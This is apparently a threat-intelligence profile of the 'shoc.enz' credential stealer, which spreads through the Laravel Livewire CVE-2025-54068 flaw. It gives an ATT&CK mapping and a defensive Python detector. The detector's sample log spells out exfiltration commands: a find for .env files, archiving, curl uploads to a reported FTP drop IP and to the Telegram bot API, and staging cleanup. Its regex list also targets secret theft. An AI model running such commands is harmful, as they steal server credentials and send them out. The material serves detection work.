Mallory
shoc.enz
Malware · Exploits 1 CVE


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2025-54068: Unauthenticated RCE in Laravel Livewire v3 Hydration (Exploited in the wild)

Security researchers at Imperva first observed the activity on May 24, 2026, when their Cloud Web Application Firewall blocked suspicious deserialization attacks that were later linked to active exploitation of CVE-2025-54068. The vulnerability affects Laravel Livewire v3 versions up to 3.6.3 and stems from improper validation during the framework’s hydration process.

This script, identified as “shoc.enz,” is a credential-harvesting tool designed to locate and extract sensitive configuration data from Laravel environments.

via Cyber Security News (cybersecuritynews.com)
MITRE ATT&CK

Techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1190 Exploit Public-Facing Application (Evidence: 1)

Initial Access: CVE-2025-54068 Exploitation ... An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.

Execution

1 technique
T1059.004 Unix Shell (Evidence: 2)

Analysis of captured attack traffic shows that attackers leveraged PHPGGC gadget chains to construct payloads that execute remote shell commands. In observed cases, compromised systems were instructed to download a malicious Bash script from a command-and-control server and execute it silently in the background.

Stealth

3 techniques
T1036 Masquerading (Evidence: 1)

MITRE ATT&CK Mapping ... T1036 Masquerading Randomized archive and staging folder names

T1070 Indicator Removal (Evidence: 1)

To evade detection, the script removes traces of its activity after execution.

T1070.004 File Deletion (Evidence: 1)

Cleanup : Deletes the local staging directory to remove forensic evidence

Credential Access

2 techniques
T1552.001 Credentials In Files (Evidence: 1)

Credential Extraction : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values

T1555 Credentials from Password Stores (Evidence: 1)

Once deployed, the malware scans the entire file system for .env files, which store critical application secrets such as database credentials, API keys, and encryption values. It extracts key fields including database hostnames, usernames, passwords, and application keys

Discovery

1 technique
T1083 File and Directory Discovery (Evidence: 1)

File Discovery : Recursively scans the entire filesystem for .env files using the find command

Collection

2 techniques
T1560 Archive Collected Data (Evidence: 1)

It extracts key fields including database hostnames, usernames, passwords, and application keys, then stages and compresses the data before exfiltrating it through multiple channels.

T1560.001 Archive via Utility (Evidence: 1)

Compression : Archives collected files using zip or tar.gz

Command and Control

1 technique
T1105 Ingress Tool Transfer (Evidence: 2)

compromised systems were instructed to download a malicious Bash script from a command-and-control server and execute it silently in the background. This script, identified as “shoc.enz,” is a credential-harvesting tool

Exfiltration

4 techniques
T1041 Exfiltration Over C2 Channel (Evidence: 1)

The threat actor operates a redundant three-channel exfiltration system ... Secondary api.telegram.org Notifications and small file uploads ... MITRE ATT&CK Mapping ... T1041 Exfiltration Over C2 Channel Telegram Bot API exfiltration

T1048 Exfiltration Over Alternative Protocol (Evidence: 1)

attackers used a multi-channel exfiltration setup involving an FTP server, the Telegram API, and the cloud storage platform GoFile.

T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol (Evidence: 1)

The threat actor operates a redundant three-channel exfiltration system: Channel Endpoint Purpose Primary FTP @ 47.129.100.149:21 Main credential storage ... MITRE ATT&CK Mapping ... T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol FTP exfiltration to 47.129.100.149

T1567.002 Exfiltration to Cloud Storage (Evidence: 1)

The threat actor operates a redundant three-channel exfiltration system ... Tertiary upload.gofile.io Backup cloud storage ... MITRE ATT&CK Mapping ... T1567.002 Exfiltration to Cloud Storage GoFile uploads
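A defender-side check built from the behaviour chain in the evidence above (T1083 recursive .env discovery, T1560.001 archiving, the FTP / Telegram / GoFile exfiltration channels, and T1070.004 staging cleanup). This is an added example, not code from Mallory or from the cited reporting; the host names and command lines in SAMPLE_LOG are constructed, and only the FTP drop address and upload endpoints come from the page.

```python
import re

# Each entry: ATT&CK technique, description, regex over a shell command line.
INDICATORS = [
    ("T1083", "recursive .env discovery", re.compile(r"\bfind\b.*-name\s+['\"]?\.env\b")),
    ("T1560.001", "archive via zip/tar", re.compile(r"\b(zip\s+-r\b|tar\s+-?[a-zA-Z]*c[a-zA-Z]*\b)")),
    ("T1048.003", "FTP upload to reported drop server", re.compile(r"ftp://47\.129\.100\.149")),
    ("T1041", "Telegram Bot API upload", re.compile(r"api\.telegram\.org/bot")),
    ("T1567.002", "GoFile upload", re.compile(r"upload\.gofile\.io")),
    ("T1070.004", "staging directory removal", re.compile(r"\brm\s+-rf?\s+/tmp/\S+")),
]

EXFIL = {"T1048.003", "T1041", "T1567.002"}

# Constructed process-audit lines ("host command"); web-02 is a benign backup job.
SAMPLE_LOG = """\
web-01 find / -name .env -type f 2>/dev/null
web-01 tar -czf /tmp/.a8f3k2/envs.tar.gz -T /tmp/.a8f3k2/list.txt
web-01 curl -s -T /tmp/.a8f3k2/envs.tar.gz ftp://47.129.100.149/
web-01 curl -s -F document=@/tmp/.a8f3k2/envs.tar.gz https://api.telegram.org/bot<TOKEN>/sendDocument
web-01 rm -rf /tmp/.a8f3k2
web-02 find /var/www/app -name .env -type f
web-02 tar -czf /backup/app-$(date +%F).tar.gz /var/www/app
"""


def analyse(log_text):
    """Return {host: {technique_id: description}} for every indicator hit."""
    hits = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        host, _, cmd = line.partition(" ")
        for tid, desc, rx in INDICATORS:
            if rx.search(cmd):
                hits.setdefault(host, {})[tid] = desc
    return hits


def verdict(techniques):
    """Discovery plus any exfil channel is the family's signature; a lone find+tar is backup noise."""
    if "T1083" in techniques and techniques & EXFIL:
        return "likely shoc.enz activity"
    if len(techniques) >= 3:
        return "suspicious"
    return "below threshold"


if __name__ == "__main__":
    for host, found in analyse(SAMPLE_LOG).items():
        print(host, verdict(set(found)), sorted(found))
```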

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 5 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 1 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 2 tracked. Other indicator types observed in public reporting.

Indicator table (values masked on the public page): 4 domains, 1 SHA-256 hash, and 1 IPv4 address, each with a latest sighting of 1 day ago.